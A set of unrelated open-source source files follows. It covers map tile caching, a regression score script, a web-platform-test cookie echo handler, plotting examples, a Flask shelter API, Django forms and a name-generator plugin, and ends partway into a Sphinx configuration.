        payload = memcache.get(cache_key)
        if not payload:
            # Fall back to the slower datastore-backed cache.
            payload = cache.get(cache_key, value_type='blob')
            if payload:
                # Re-populate the faster memcache layer.
                memcache.add(cache_key, payload)
            else:
                # Last resort: fetch the tile from CartoDB itself.
                fetched = urlfetch.fetch(source_url, deadline=60)
                if fetched.status_code in (200, 304):
                    payload = fetched.content
                    cache.add(cache_key, payload, value_type='blob')
                    memcache.add(cache_key, payload)
        if payload:
            self.response.headers["Content-Type"] = "image/png"
            self.response.headers["Cache-Control"] = "max-age=2629743" # Cache 1 month
            self.response.out.write(payload)
        else:
            self.error(404)
class GridHandler(webapp2.RequestHandler):
    """Serves UTFGrid JSON through the same two-level cache as tiles."""

    def get(self):
        """Return the requested grid JSON, falling back to CartoDB on a cache miss."""
        source_url = self.request.url.replace(app_host, 'http://mol.cartodb.com')
        cache_key = 'utfgrid-%s' % hashlib.sha224(source_url).hexdigest()
        body = memcache.get(cache_key)
        if not body:
            # Datastore-backed cache is the second tier.
            body = cache.get(cache_key)
            if body:
                memcache.add(cache_key, body)
            else:
                fetched = urlfetch.fetch(source_url, deadline=60)
                if fetched.status_code in (200, 304):
                    body = fetched.content
                    cache.add(cache_key, body)
                    memcache.add(cache_key, body)
        if not body:
            self.error(404)
            return
        self.response.headers["Content-Type"] = "application/json"
        self.response.headers["Cache-Control"] = "max-age=2629743" # Cache 1 month
        self.response.out.write(body)
# URL routing: tile images and UTFGrid JSON share the same path layout.
application = webapp2.WSGIApplication(
    [('/tiles/[a-zA-Z0-9_-]+/[\d]+/[\d]+/[\d]+.png?.*', TileHandler),
     ('/tiles/[a-zA-Z0-9_-]+/[\d]+/[\d]+/[\d]+.grid.json?.*', GridHandler),],
    debug=True)
def main():
    """WSGI entry point used when the module is run directly."""
    run_wsgi_app(application)
if __name__ == "__main__":
    main()
| MapofLife/MOL | app/tile_handler.py | Python | bsd-3-clause | 3,335 |
"""Compute the regression cost between a prediction file and a target file.

Usage: score.py <predictions.csv> <targets.csv>
"""
import numpy as np
from util import load_csv
import sys

y = load_csv(sys.argv[1])
t = load_csv(sys.argv[2])
# Both files must contain the same number of rows.
assert len(y) == len(t)
# Half mean squared error (the 1/2 factor is the usual regression cost convention).
mse = np.sum((y - t)**2) / (2 * (len(y)))
# Parenthesised print works identically under Python 2 and Python 3.
print(mse)
| williamd4112/simple-linear-regression | score.py | Python | mit | 188 |
def main(request, response):
    """wptserve handler: echo the COOKIE_NAME cookie back via postMessage.

    CORS headers mirror the request's Origin and allow credentials so the
    cookie is sent on cross-origin requests.
    """
    origin = request.headers.get("Origin")
    headers = [("Content-Type", "text/javascript"),
               ("Access-Control-Allow-Origin", origin),
               ("Access-Control-Allow-Credentials", "true")]
    cookie = request.cookies.first("COOKIE_NAME", None)
    value = cookie.value if cookie else ''
    return (200, headers, "postMessage('" + value + "');")
| peterjoel/servo | tests/wpt/web-platform-tests/workers/modules/resources/credentials.py | Python | mpl-2.0 | 452 |
# -*- coding: utf-8 -*-
"""
========
Logscale
========
For when linear is just not good enough.
You can set the `log_scale` property with a boolean, or specify a list of bools, or a list of parameter indexes,
or a list of parameter names, or a dictionary from parameter names to boolean values. Most things work, just give
it a crack.
"""
import numpy as np
from chainconsumer import ChainConsumer
from scipy.stats import lognorm
# Draw 100k samples from a 2D lognormal distribution: heavy-tailed data
# that log-scaled axes display far better than linear ones.
data = lognorm.rvs(0.95, loc=0, size=(100000, 2))
c = ChainConsumer()
c.add_chain(data, parameters=["$x_1$", "$x_2$"])
fig = c.plotter.plot(figsize="column", log_scales=True)
fig.set_size_inches(3 + fig.get_size_inches())  # Resize fig for doco. You don't need this.
###############################################################################
# It's not just for the main corner plot, you can do it anywhere.
fig = c.plotter.plot_walks(log_scales={"$x_1$": False})  # Dict example
fig.set_size_inches(3 + fig.get_size_inches())  # Resize fig for doco. You don't need this.
fig = c.plotter.plot_distributions(log_scales=[True, False])  # list[bool] example
fig.set_size_inches(3 + fig.get_size_inches())  # Resize fig for doco. You don't need this.
| Samreay/ChainConsumer | examples/customisations/plot_logscale.py | Python | mit | 1,195 |
# Coverage-tool fixture: the `if False` guard makes the for-loop body
# unreachable, so only the `else` branch ever executes. Keep as-is.
if False:
    for i in [1,2]:
        pass
else:
    pass
| RedHatQE/python-moncov | test/code/if_false_for_some.py | Python | gpl-3.0 | 48 |
def getText(path, mediaType):
    """Return the extracted text for *path*, or "" when it should not be indexed."""
    usable, body = useBodyContent(path, mediaType)
    return body if usable else ""
def getMediaType(path):
    """Detect the MIME type of *path* via Tika (-d), stripped of trailing whitespace."""
    return runTika("-d", path).rstrip()
def useBodyContent(path, mediaType):
    """Decide whether *path*'s extracted text is worth indexing.

    Returns a (use, content) pair: *use* is True when the content should
    be indexed, and *content* is the extracted text (or "").
    """
    if mediaType == "text/plain":
        # Plain text is only used when it looks like natural language.
        return containsSearchableContent(path)
    if mediaType == "application/vnd.openxmlformats-officedocument.presentationml.presentation":
        # PowerPoint presentations: always index the extracted text.
        return (True, runTika("-t", path))
    return (False, "")
def containsSearchableContent(path):
    """Extract text from *path* and decide whether it is mostly natural language.

    Returns (searchable, content) where *searchable* is True when more than
    60% of the non-blank lines contain at least two words (see hasWords).
    """
    content = runTika("-t", path)
    linesWithWords = 0
    nonBlankLines = 0
    for line in content.split('\n'):
        stripped = line.rstrip()
        if stripped:
            nonBlankLines += 1
            if hasWords(stripped):
                linesWithWords += 1
    # Guard against empty / whitespace-only documents: the original code
    # raised ZeroDivisionError here when there were no non-blank lines.
    if nonBlankLines == 0:
        return (False, content)
    percentage = float(linesWithWords) / float(nonBlankLines)
    return ((percentage > 0.6), content)
def hasWords(what):
    """Return True when *what* contains at least two words of >= 3 letters.

    A "word" is a maximal run of alphabetic characters; runs shorter than
    three letters do not count.
    """
    wordCount = 0
    charactersInARow = 0
    inWord = False
    for c in what:
        if c.isalpha():
            if not inWord:
                inWord = True
            charactersInARow += 1
        else:
            if inWord and charactersInARow >= 3:
                wordCount += 1
            inWord = False
            charactersInARow = 0
    # Count a word that runs to the end of the string: the original loop
    # dropped it, so e.g. "hello world" was not detected as two words.
    if inWord and charactersInARow >= 3:
        wordCount += 1
    return wordCount >= 2
| materials-commons/materialscommons.org | backend/loader/tasks/extract.py | Python | mit | 1,402 |
#! /usr/bin/env python
#-*- coding: utf-8 -*-
# ***** BEGIN LICENSE BLOCK *****
#
#
# ***** END LICENSE BLOCK *****
__author__ = ""
__version__ = ""
__date__ = ""
__revision__ = ""
__copyright__ = ""
__license__ = ""
from bootstrap import db, app
from sqlalchemy.sql import func, select, desc
from flask import Blueprint, jsonify, request, json, Response, send_from_directory
from collections import defaultdict
from web.models import Shelter, Attribute, AttributePicture, Property, Value, Association, ShelterPicture, ShelterDocument, Category, Tsvector, Translation
import conf, os.path
from web.notifications import notifications
from web.decorators import docstring_formatter
# All routes defined below are mounted under /api/v0.2.
apiv02_bp = Blueprint('development api v0.2', __name__, url_prefix='/api/v0.2')
def tree():
    """Return an autovivifying nested dict: any missing key creates a sub-tree."""
    return defaultdict(tree)
def jsonify_utf8(text):
    """Serialize *text* as JSON into a Response with an explicit UTF-8 charset.

    Useful when serving static files as JSON so UTF-8 characters are shown
    properly.
    """
    payload = json.dumps(text, indent=3, sort_keys=False)
    return Response(payload, mimetype='application/json;charset=utf-8')
def populate_dictree(query, catquery, dictree, prettytext=False):
    """Fill *dictree* with shelter properties from *query* and return it.

    query      -- rows exposing shelter_id, supercategory_name, name,
                  uniqueid, type and value attributes
    catquery   -- rows exposing category names; used to pre-create the
                  "Identification" skeleton slots for each new shelter
    dictree    -- autovivifying tree() to populate (also returned)
    prettytext -- key attributes by display name instead of uniqueid
    """
    YES_NO = ("no", "yes")
    for row in query:
        if not dictree[row.shelter_id]:
            # First property seen for this shelter: create the skeleton
            # slots under the "Identification" category.
            for category in catquery:
                if category.name == "Identification":
                    section = dictree[row.shelter_id][category.name]
                    section["Cover"]
                    section["Attributes"]
                    section["Pictures"]
                    section["Documents"]
        key = row.name if prettytext else row.uniqueid
        if row.type == "yes / no":
            # Boolean attributes are stored as "0"/"1"; render as "no"/"yes".
            value = YES_NO[int(row.value)]
        else:
            value = row.value
        dictree[row.shelter_id][row.supercategory_name]["Attributes"][key] = value
    return dictree
def populate_documents(query, dictree, docpath):
    """Attach document URLs to shelters already present in *dictree*.

    Rows whose shelter_id is not already a key of *dictree* are skipped;
    *dictree* is returned for chaining.
    """
    for doc in query:
        if doc.shelter_id not in dictree:
            continue
        url = "{}/{}/{}".format(docpath, doc.shelter_id, doc.filename)
        slot = dictree[doc.shelter_id][doc.name]
        if slot["Documents"]:
            slot["Documents"].append(url)
        else:
            slot["Documents"] = [url]
    return dictree
def populate_pictures(query, dictree, picpath):
    """Attach picture URLs to shelters already present in *dictree*.

    Main pictures accumulate under Identification/Cover; for any other
    category only the FIRST picture is kept -- later ones are ignored,
    mirroring the existing behaviour.
    """
    for pic in query:
        if pic.shelter_id not in dictree:
            continue
        url = "{}/{}/{}".format(picpath, pic.shelter_id, pic.filename)
        if pic.is_main_picture == True:
            cover = dictree[pic.shelter_id]["Identification"]["Cover"]
            if cover:
                cover.append(url)
            else:
                dictree[pic.shelter_id]["Identification"]["Cover"] = [url]
        elif not dictree[pic.shelter_id][pic.name]["Pictures"]:
            dictree[pic.shelter_id][pic.name]["Pictures"] = [url]
    return dictree
@apiv02_bp.route('/', methods=['GET'])
def apimessage():
    """Return a small JSON banner identifying the development API."""
    payload = tree()
    payload["API version"] = 0.2
    payload["Message"] = "This is the development API"
    return jsonify(payload)
@apiv02_bp.route('/email', methods=['GET'])
def mail():
    # Debug endpoint: fires a "new shelter" notification e-mail for the
    # first shelter in the database.
    # NOTE(review): no value is returned, so Flask will raise when this view
    # is hit -- confirm whether this endpoint is still needed.
    query = Shelter.query.first()
    notifications.new_shelter_creation(query)
@apiv02_bp.route('/documentation', methods=['GET'])
def documentation():
    """
    Serve the static API documentation page (apidoc.html).
    """
    return send_from_directory('static/documentation','apidoc.html')
@apiv02_bp.route('/glossary', methods=['GET'])
def glossary():
    """
    Retrieve the glossary in JSON format, readable by Glossarizer
    (https://github.com/PebbleRoad/glossarizer)
    """
    with app.open_resource('static/data/glossary.json') as glossary_file:
        entries = json.load(glossary_file, encoding='utf-8')
    return jsonify_utf8(entries)
@apiv02_bp.route('/worldmap', methods=['GET'])
def worldmap():
    """
    Retrieve a world map in GeoJSON format, with polygons and a centroid
    point representing each country.
    """
    with app.open_resource('static/data/countries.geojson') as geojson_file:
        world = json.load(geojson_file, encoding='utf-8')
    return jsonify_utf8(world)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/attributes/pictures', methods=['GET'])
@apiv02_bp.route('/attributes/pictures/<language_code>', methods=['GET'])
def attribute_pictures(language_code='en'):
    """
    Retrieve attribute pictures in a given language. If no language code parameter supplied, the default language is English.

    :param language_code: language code, in lower case two letter format. Example: 'fr' for French
    :type language_code: string

    **Example requests**:

    .. sourcecode:: html

       # get attribute pictures in default language (English)
       GET {0}/api/v0.2/attributes/pictures

       # get attribute pictures in French
       GET {0}/api/v0.2/attributes/pictures/fr
    """
    result = tree()
    picpath = conf.ATTRIBUTES_PICTURES_SITE_PATH
    # One row per (category, attribute): the picture paths for the requested
    # language are aggregated into a single array per attribute.
    query = db.session.query(Attribute.name, Category.name.label("category_name"),
                             func.array_agg(picpath + '/' + language_code + '/' + AttributePicture.file_name).label("file_names"))\
        .join(AttributePicture, Attribute.id==AttributePicture.attribute_id)\
        .join(Category, Category.id==Attribute.category_id)\
        .filter(AttributePicture.language_code==language_code)\
        .group_by(Category.name, Attribute.name)
    for a in query:
        result[a.category_name][a.name] = a.file_names
    return jsonify(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/attributes/pictures/has/<uniqueid>', methods=['GET'])
def has_picture(uniqueid):
    """
    Retrieve attribute picture for specific attribute

    :param uniqueid: uniqueid of the attribute
    :type uniqueid: string

    **Example requests**:

    .. sourcecode:: html

       # get pictures for Foundation Type (uniqueid: foundationtype)
       GET {0}/api/v0.2/attributes/pictures/has/foundationtype
    """
    picpath = conf.ATTRIBUTES_PICTURES_SITE_PATH
    # First picture registered for the attribute, or None when there is none.
    query = db.session.query(AttributePicture.file_name).join(Attribute).filter(Attribute.uniqueid==uniqueid).first()
    if query:
        result = {uniqueid: [picpath + '/' + query[0]]}
    else:
        # Signal "no picture" with an explicit False so clients can test it.
        result = {uniqueid: [False]}
    # (Removed a leftover debug `print(query)` and a dead `result = tree()`
    # initialisation that was unconditionally overwritten.)
    return jsonify(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/attributes/<attribute_name>', methods=['GET'])
def getattributes(attribute_name, safetext=False):
    """
    Retrieve available values for a given `attribute_name`,
    separated by semicolons.

    :param attribute_name: uniqueid of an attribute name

    **Example requests**:

    .. sourcecode:: html

       # get all values for attribute "Floor finish material" (uniqueid: floorfinishmaterial)
       GET {0}/api/v0.2/attributes/floorfinishmaterial
    """
    # `safetext` is accepted for backward compatibility but currently unused.
    values = Attribute.query.filter(Attribute.uniqueid==attribute_name).\
        first().associated_values
    result = tree()
    result[attribute_name] = ";".join(value.name for value in values)
    return jsonify(result)
@apiv02_bp.route('/translation', methods=['GET'])
def available_translations():
    """
    Retrieve language codes of available translations.
    """
    result = tree()
    # Distinct language codes present in the Translation table...
    subquery = db.session.query(Translation.language_code).group_by(Translation.language_code).subquery()
    # ...collapsed into a single array so one row holds every code.
    query = db.session.query(func.array_agg(subquery.c.language_code)).first()
    result["languages"]= query[0]
    return jsonify_utf8(result)
@apiv02_bp.route('/translation/<language_code>', methods=['GET'])
def translations(language_code=None):
    """
    Retrieve translations for a given `language_code` as a mapping from the
    original phrase to its translated form.

    :param language_code: language code
    :type language_code: string
    """
    result = tree()
    query = Translation.query.filter(Translation.language_code==language_code)
    phrases = query
    for phrase in phrases:
        result[phrase.original]=phrase.translated
    return jsonify_utf8(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/shelters', methods=['GET'])
@apiv02_bp.route('/shelters/<int:shelter_id>', methods=['GET'])
def allshelters(shelter_id=None):
    """
    Retrieves shelters with all of their attributes and pictures.

    :param shelter_id: a unique shelter ID generated by the server
    :type shelter_id: int

    :query format:
        if set to ``prettytext``,
        attribute names are retrieved as nicely formatted text
        (Capital letters, special characters and spaces allowed)
    :query attribute:
        attribute name
    :query value:
        attribute value
    :query q:
        Full text search. Works in English language only.

    **Example requests**:

    .. sourcecode:: html

       # get all shelters
       GET {0}/api/v0.2/shelters

       # get shelter with shelter ID 11
       GET {0}/api/v0.2/shelters/11

       # get all shelters which have attribute 'storeys'
       GET {0}/api/v0.2/shelters?attribute=storeys

       # get all shelters which have 2 storeys
       GET {0}/api/v0.2/shelters?attribute=storeys&value=2
    """
    result = tree()
    picpath = os.path.relpath(conf.SHELTERS_PICTURES_SITE_PATH)
    docpath = os.path.relpath(conf.SHELTERS_DOCUMENTS_SITE_PATH)
    pretty = False
    # Self-join alias: each category's parent acts as its "super category".
    Supercategory = db.aliased(Category)
    # Base query: one row per (shelter, attribute), with multi-values
    # aggregated into a single semicolon-separated string.
    querybase = db.session.query(Property.shelter_id, Category.name.label("category_name"), Supercategory.name.label("supercategory_name"), Attribute.name, Attribute.uniqueid, Attribute.type, func.string_agg(Value.name,';').label("value"))\
        .join(Shelter, Shelter.id==Property.shelter_id)\
        .join(Category, Category.id==Property.category_id)\
        .join(Attribute, Attribute.id==Property.attribute_id)\
        .join(Supercategory, Supercategory.id==Category.parent_id)\
        .join(Association, Property.id==Association.property_id)\
        .join(Value, Association.value_id==Value.id)\
        .group_by(Property.shelter_id, Supercategory.name, Category.name, Attribute.name, Attribute.uniqueid, Attribute.type)
    picquerybase = db.session.query(ShelterPicture.shelter_id, ShelterPicture.file_name.label("filename"), ShelterPicture.is_main_picture, Category.name)\
        .join(Category, Category.id == ShelterPicture.category_id)
    catquery = db.session.query(Category.name).filter(Category.section_id != None)
    docquerybase = db.session.query(ShelterDocument.shelter_id, ShelterDocument.file_name.label("filename"), ShelterDocument.category_id, Category.name)\
        .join(Category, Category.id == ShelterDocument.category_id)
    ##queries if no request arguments
    shelter_properties = querybase
    shelter_pictures = picquerybase
    shelter_documents = docquerybase
    if shelter_id:
        shelter_properties = querybase.filter(Property.shelter_id==shelter_id)
        shelter_pictures = picquerybase.filter(ShelterPicture.shelter_id==shelter_id)
        shelter_documents = docquerybase.filter(ShelterDocument.shelter_id==shelter_id)
    else:
        #only query published shelters if no shelter_id supplied
        shelter_properties = shelter_properties.filter(Shelter.is_published == True)
    # ?attribute=... : restrict to shelters possessing ALL listed attributes.
    if request.args.getlist('attribute'):
        attribute = request.args.getlist('attribute')
        subquery = db.session.query(Property.shelter_id)\
            .join(Attribute, Attribute.id==Property.attribute_id)\
            .filter(Attribute.uniqueid.in_(attribute))\
            .group_by(Property.shelter_id)
        shelter_properties = shelter_properties.filter(subquery.subquery().c.shelter_id==Property.shelter_id)
        shelter_pictures = shelter_pictures.filter(subquery.subquery().c.shelter_id==ShelterPicture.shelter_id)
        shelter_documents = shelter_documents.filter(subquery.subquery().c.shelter_id==ShelterDocument.shelter_id)
    # ?value=... : further restrict by attribute value (reuses the attribute
    # subquery when one was built above).
    if request.args.getlist('value'):
        value = request.args.getlist('value')
        if not request.args.getlist('attribute'):
            subquery = db.session.query(Property.shelter_id)\
                .join(Attribute, Attribute.id==Property.attribute_id)\
                .filter(Property.values.any(Value.name.in_(value)))\
                .group_by(Property.shelter_id)
        else:
            subquery = subquery.filter(Property.values.any(Value.name.in_(value)))
        shelter_properties = shelter_properties.filter(subquery.subquery().c.shelter_id==Property.shelter_id)
        shelter_pictures = shelter_pictures.filter(subquery.subquery().c.shelter_id==ShelterPicture.shelter_id)
        shelter_documents = shelter_documents.filter(subquery.subquery().c.shelter_id==ShelterDocument.shelter_id)
    # ?q=... : PostgreSQL full-text search against the per-shelter tsvector.
    if request.args.get('q'):
        attribute = request.args.get('q')
        shelter_properties = shelter_properties.join(Tsvector, Property.shelter_id==Tsvector.shelter_id).filter(Tsvector.lexeme.match(attribute))
        shelter_pictures = shelter_pictures.join(Tsvector, ShelterPicture.shelter_id==Tsvector.shelter_id).filter(Tsvector.lexeme.match(attribute))
        shelter_documents = shelter_documents.join(Tsvector, ShelterDocument.shelter_id==Tsvector.shelter_id).filter(Tsvector.lexeme.match(attribute))
    if request.args.get('format') == 'prettytext':
        pretty = True
    result = populate_dictree(shelter_properties, catquery, result, prettytext=pretty)
    populate_pictures(shelter_pictures, result, picpath)
    populate_documents(shelter_documents, result, docpath)
    return jsonify(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/shelters/latest', methods=['GET'])
@apiv02_bp.route('/shelters/latest/<int:count>', methods=['GET'])
def latestshelters(count=1):
    """
    Retrieves latest shelters (updates to existing shelters also count).
    Only retrieves shelters that have pictures. If no count parameter is supplied, the API
    retrieves the latest shelter.

    :param count: number of latest shelters to return
    :type count: int

    **Example requests**:

    .. sourcecode:: html

       # get latest shelter
       GET {0}/api/v0.2/shelters/latest

       # get the 3 latest shelters
       GET {0}/api/v0.2/shelters/latest/3
    """
    result = tree()
    pretty = False
    picpath = os.path.relpath(conf.SHELTERS_PICTURES_SITE_PATH)
    Supercategory = db.aliased(Category)
    # Shelters that have a main picture...
    subsubquery = db.session.query(ShelterPicture.shelter_id).filter(ShelterPicture.is_main_picture == True).subquery()
    # ...restricted to published ones, newest first, limited to `count`.
    subquery= db.session.query(Shelter)\
        .filter(Shelter.is_published == True)\
        .filter(Shelter.id.in_(subsubquery))\
        .order_by(desc(Shelter.updated_at))\
        .limit(count).subquery()
    # Same property aggregation as allshelters(), but driven off the
    # limited "latest shelters" subquery.
    querybase = db.session.query(subquery.c.id.label("shelter_id"), Category.name.label("category_name"), Supercategory.name.label("supercategory_name"), Attribute.name, Attribute.uniqueid, Attribute.type, func.string_agg(Value.name,';').label("value"))\
        .join(Property, subquery.c.id==Property.shelter_id)\
        .join(Category, Category.id==Property.category_id)\
        .join(Attribute, Attribute.id==Property.attribute_id)\
        .join(Supercategory, Supercategory.id==Category.parent_id)\
        .join(Association, Property.id==Association.property_id)\
        .join(Value, Association.value_id==Value.id)\
        .order_by(desc(subquery.c.updated_at))\
        .group_by(subquery.c.updated_at,subquery.c.id, Supercategory.name, Category.name, Attribute.name, Attribute.uniqueid,Attribute.type)
    picquerybase = db.session.query(ShelterPicture.shelter_id, ShelterPicture.file_name.label("filename"), ShelterPicture.is_main_picture, Category.name)\
        .join(Category, Category.id == ShelterPicture.category_id)
    catquery = db.session.query(Category.name).filter(Category.section_id != None)
    ##queries if no request arguments
    shelter_properties = querybase
    shelter_pictures = picquerybase
    if request.args.get('format') == 'prettytext':
        pretty = True
    result = populate_dictree(shelter_properties, catquery, result, prettytext=pretty)
    populate_pictures(shelter_pictures, result, picpath)
    return jsonify(result)
| rodekruis/shelter-database | src/web/views/api/shelter_api_v02.py | Python | mit | 16,979 |
from django import forms
from .models import Policy, Operation
# (value, label) choices for per-frame ffmpeg/QCTools signal metadata keys.
# Values are the raw lavfi metadata keys; labels are what users see.
SIGNALS = (
    ('None', 'None'),
    ('lavfi.signalstats.BRNG', 'BRNG'),
    ('lavfi.cropdetect.y2', 'Crop Bottom'),
    ('lavfi.cropdetect.y1', 'Crop Top'),
    ('lavfi.cropdetect.x1', 'Crop Left'),
    ('lavfi.cropdetect.x2', 'Crop Right'),
    ('lavfi.cropdetect.h', 'Crop Height'),
    ('lavfi.cropdetect.w', 'Crop Width'),
    ('lavfi.cropdetect.x', 'Crop X'),
    ('lavfi.cropdetect.y', 'Crop Y'),
    ('lavfi.signalstats.HUEAVG', 'HUE AVG'),
    ('lavfi.signalstats.HUEMED', 'HUE MED'),
    ('lavfi.psnr.mse_avg', 'MSEf Avg'),
    ('lavfi.psnr.mse.u', 'MSEf U'),
    ('lavfi.psnr.mse.v', 'MSEf V'),
    ('lavfi.psnr.mse.y', 'MSEf Y'),
    ('lavfi.psnr.psnr_avg', 'PSNRf Avg'),
    ('lavfi.psnr.psnr.u', 'PSNRf U'),
    ('lavfi.psnr.psnr.v', 'PSNRf V'),
    ('lavfi.psnr.psnr.y', 'PSNRf Y'),
    ('lavfi.r128.I', 'R128.I'),
    ('lavfi.r128.LRA', 'R128.LRA'),
    # Label fixed: was 'R28.LRA.high', inconsistent with the other R128 labels.
    ('lavfi.r128.LRA.high', 'R128.LRA.high'),
    ('lavfi.r128.LRA.low', 'R128.LRA.low'),
    ('lavfi.r128.M', 'R128.M'),
    ('lavfi.r128.S', 'R128.S'),
    ('lavfi.signalstats.SATAVG', 'SAT AVG'),
    ('lavfi.signalstats.SATHIGH', 'SAT HIGH'),
    ('lavfi.signalstats.SATLOW', 'SAT LOW'),
    ('lavfi.signalstats.SATMAX', 'SAT MAX'),
    ('lavfi.signalstats.SATMIN', 'SAT MIN'),
    ('lavfi.signalstats.TOUT', 'TOUT'),
    ('lavfi.signalstats.UAVG', 'U AVG'),
    ('lavfi.signalstats.UDIF', 'U DIF'),
    ('lavfi.signalstats.UHIGH', 'U HIGH'),
    ('lavfi.signalstats.ULOW', 'U LOW'),
    ('lavfi.signalstats.UMAX', 'U MAX'),
    ('lavfi.signalstats.UMIN', 'U MIN'),
    ('lavfi.signalstats.VAVG', 'V AVG'),
    ('lavfi.signalstats.VDIF', 'V DIF'),
    ('lavfi.signalstats.VHIGH', 'V HIGH'),
    ('lavfi.signalstats.VLOW', 'V LOW'),
    ('lavfi.signalstats.VMAX', 'V MAX'),
    ('lavfi.signalstats.VMIN', 'V MIN'),
    ('lavfi.signalstats.VREP', 'VREP'),
    ('lavfi.signalstats.YAVG', 'Y AVG'),
    ('lavfi.signalstats.YDIF', 'Y DIF'),
    ('lavfi.signalstats.YHIGH', 'Y HIGH'),
    ('lavfi.signalstats.YLOW', 'Y LOW'),
    ('lavfi.signalstats.YMAX', 'Y MAX'),
    ('lavfi.signalstats.YMIN', 'Y MIN')
)
# Aggregations that can be applied to a signal across all frames.
OPERATIONS = (
    ('average', 'average'),
    ('exceeds', 'count of frames with value above'),
    ('equals', 'count of frames with value equal to'),
    ('belows', 'count of frames with value below'),
    ('average_difference', 'average_difference'),
)
# NOTE(review): choice values are the strings 'True'/'False' paired with
# booleans -- confirm which representation consumers of DASHBOARD expect.
DASHBOARD = (('True', True), ('False', False))
class PolicyNameForm(forms.Form):
    """Minimal form used when only a policy's name needs to be collected."""
    policy_name = forms.CharField(label='Policy name', max_length=200)
class PolicyFileForm(forms.Form):
    """Upload form for policy files; the widget allows selecting multiple files."""
    policyfile = forms.FileField(
        widget=forms.ClearableFileInput(attrs={'multiple': True}),
        label='Select a policy file',
        help_text=''
    )
class PolicyForm(forms.Form):
    """Policy metadata: name, description, display ordering and dashboard flag."""
    policy_name = forms.CharField(
        label='Policy name'
    )
    description = forms.CharField(
        label='Policy Description',
        required=False
    )
    # Presumably lower numbers are displayed first -- TODO confirm in the view.
    display_order = forms.IntegerField(
        label='Display Location No.', initial=0
    )
    # NOTE(review): a ChoiceField rendered as a checkbox works, but
    # forms.BooleanField would express the intent more directly.
    dashboard = forms.ChoiceField(
        widget=forms.CheckboxInput,
        required=False, label='Show in Dashboard'
    )
class OperationForm(forms.Form):
    """One policy rule: a signal, an operation, and its thresholds/metadata."""
    signal_fields = forms.ChoiceField(choices=SIGNALS, required=True)
    # The onChange hook apparently lets the page react to the selected
    # operation (e.g. reveal the second-signal field) -- TODO confirm against
    # the template's operationSelect() JavaScript.
    operation_fields = forms.ChoiceField(
        choices=OPERATIONS,
        required=True,
        widget=forms.Select(attrs={"onChange": 'operationSelect(this)'})
    )
    # Only meaningful for two-signal operations such as 'average_difference'.
    second_signal_fields = forms.ChoiceField(
        choices=SIGNALS, required=False
    )
    cutoff_number = forms.FloatField(
        label='Please enter the cut off number', initial=0
    )
    display_order = forms.IntegerField(
        label='Please enter the display order', initial=0
    )
    description = forms.CharField(
        label='Policy Description',
        required=False
    )
    # NOTE(review): same ChoiceField-as-checkbox pattern as PolicyForm.
    dashboard = forms.ChoiceField(widget=forms.CheckboxInput, required=False)
    percentage = forms.FloatField(
        label='Dashboard Group error percentage', initial=0
    )
    file_percentage = forms.FloatField(
        label='Dashboard File error percentage', initial=0
    )
| yayoiukai/signalserver | policies/forms.py | Python | mit | 4,131 |
import plugin
import hashlib
import electrum
def pick(chars, word, i):
    # Return the i-th (mod count) character of `word` that also appears in
    # `chars`.  Falls back to a space -- and logs the miss -- when `word`
    # contains no such character.  (Python 2 file: print statement.)
    filtered = [w for w in word if w in chars]
    if len(filtered) == 0:
        print '>', repr(chars), repr(word), i
        return ' '
    else:
        return filtered[i % len(filtered)]
def pick_vowel(word, i):
    # Deterministically pick a vowel ('y' counts as one) from `word`.
    return pick('aeiouy', word, i)
def pick_consonant(word, i):
    # Deterministically pick a consonant from `word`.
    return pick('bcdfghjklmnpqrstvwxyz', word, i)
class Plugin(plugin.Plugin):
    """Plugin that derives a deterministic, pronounceable three-part name
    from a seed string."""

    def __init__(self):
        plugin.Plugin.__init__(self, 'Name', 'Generates a pronouncable name.')
        self.fields = []

    def doit(self, seed):
        """Build first/middle/last name parts by alternating consonants and
        vowels picked from the mnemonic words of sha512(seed)."""
        # sha512 with electrum gives us 48 words to work with
        words = electrum.mnemonic_encode(hashlib.sha512(seed).hexdigest())  # Words used:
        len_first = 3 + int(hashlib.md5(words[0]).hexdigest()[:10], 16) % 5   # 8
        len_middle = 1 + int(hashlib.md5(words[1]).hexdigest()[:10], 16) % 8  # 9
        len_last = 2 + int(hashlib.md5(words[2]).hexdigest()[:10], 16) % 10   # 12
        words = words[3:]                                                     # + 3
        #                                                                     # =32
        ret = ''
        for i, w in enumerate(words):
            # Alternate consonant/vowel so the result is pronounceable.
            if i % 2:
                ret += pick_vowel(w, i)
            else:
                ret += pick_consonant(w, i)
            # BUGFIX: this bookkeeping must run on every iteration.  It was
            # previously dedented out of the loop, which both skipped the
            # per-character length checks and made `break` a SyntaxError
            # (break outside loop).  Insert a space once a part reaches its
            # target length; stop when the third part is complete.
            name = ret.split()
            if len(name) == 1 and len(name[0]) == len_first:
                ret += ' '
            elif len(name) == 2 and len(name[1]) == len_middle:
                ret += ' '
            if len(name) == 3 and len(name[2]) == len_last:
                break
        name = ' '.join(w.capitalize() for w in ret.split())
        return plugin.Return('Your name is: %s' % name)
if __name__ == '__main__':
    # Smoke test: derive 25 names from numbered variants of the seed
    # (seed defaults to 'seed', override via the single CLI argument).
    import sys
    seed = 'seed'
    if len(sys.argv) == 2:
        seed = sys.argv[1]
    p = Plugin()
    for i in range(25):
        print '>', seed, i,':',
        p.doit(hashlib.sha512(seed + str(i)).hexdigest())
| arttukasvio/deterministic | name.py | Python | unlicense | 1,821 |
# -*- coding: utf-8 -*-
#
# python-loaders documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 10 09:57:03 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# One import per line (PEP 8).  Both modules are only needed if the
# commented-out sys.path manipulation below is re-enabled.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
